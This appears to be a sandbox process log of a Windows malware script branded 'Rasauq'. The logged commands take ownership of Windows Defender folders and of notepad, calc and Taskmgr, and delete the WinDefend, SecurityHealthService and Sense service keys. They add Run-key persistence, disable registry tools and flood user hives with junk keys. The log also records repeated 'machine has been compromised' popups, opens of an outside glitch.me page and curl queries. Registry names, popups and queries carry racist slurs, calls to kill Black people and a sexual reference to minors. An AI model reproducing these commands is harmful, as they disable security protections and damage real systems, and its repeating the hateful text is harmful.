C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in
C:\Windows\system32\powercfg.exe
powercfg /devicedisablewake "Device Name"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q
C:\Windows\system32\takeown.exe
takeown /f "C:\Program Files\Windows Defender" /r /d y
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q
C:\Windows\system32\powercfg.exe
powercfg /devicedisablewake "USB Root Hub"
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCR\behead all niggers" /f
C:\Windows\system32\reg.exe
reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k
C:\Windows\system32\reg.exe
reg query "HKU" /s /f "Software" /k
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\notepad.exe /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\calc.exe /a /r /d y
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "End of search: 20 match(es) found.\Software\Rasauq on top" /f
C:\Windows\system32\msg.exe
msg * /time:3 "This machine has been compromised by Rasuaq"
C:\Windows\system32\timeout.exe
timeout /t 3 /nobreak
C:\Windows\system32\powercfg.exe
powercfg /hibernate off REM Disables hibernation
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in
C:\Windows\system32\powercfg.exe
powercfg /devicedisablewake "Device Name"
C:\Windows\system32\powercfg.exe
powercfg /devicedisablewake "USB Root Hub"
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCR\behead all niggers" /f
C:\Windows\system32\reg.exe
reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k
C:\Windows\system32\reg.exe
reg query "HKU" /s /f "Software" /k
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\AppDataLow\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "End of search: 39 match(es) found.\Software\Rasauq on top" /f
C:\Windows\system32\msg.exe
msg * /time:3 "This machine has been compromised by Rasuaq"
C:\Windows\system32\timeout.exe
timeout /t 3 /nobreak
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\System32\pcaui.exe
C:\Windows\System32\pcaui.exe -n 0 -a "" -v "" -g "" -x ""
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2f4,0x7ffbbb9bf208,0x7ffbbb9bf214,0x7ffbbb9bf220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1836,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=2208 /prefetch:11
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2176,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=2168 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2548,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=2436 /prefetch:13
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3444,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3476,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4180,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=4368 /prefetch:9
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4108,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=4340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4156,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=4344 /prefetch:9
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4164,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=4356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3612,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5040 /prefetch:14
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=5040,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5036 /prefetch:1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3856,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5004 /prefetch:14
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=5520,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=4148 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=5580,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5600 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=5732,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5708 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=5576,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5896 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6056,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=6032 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=6052,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=6268 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=6452,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=6428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
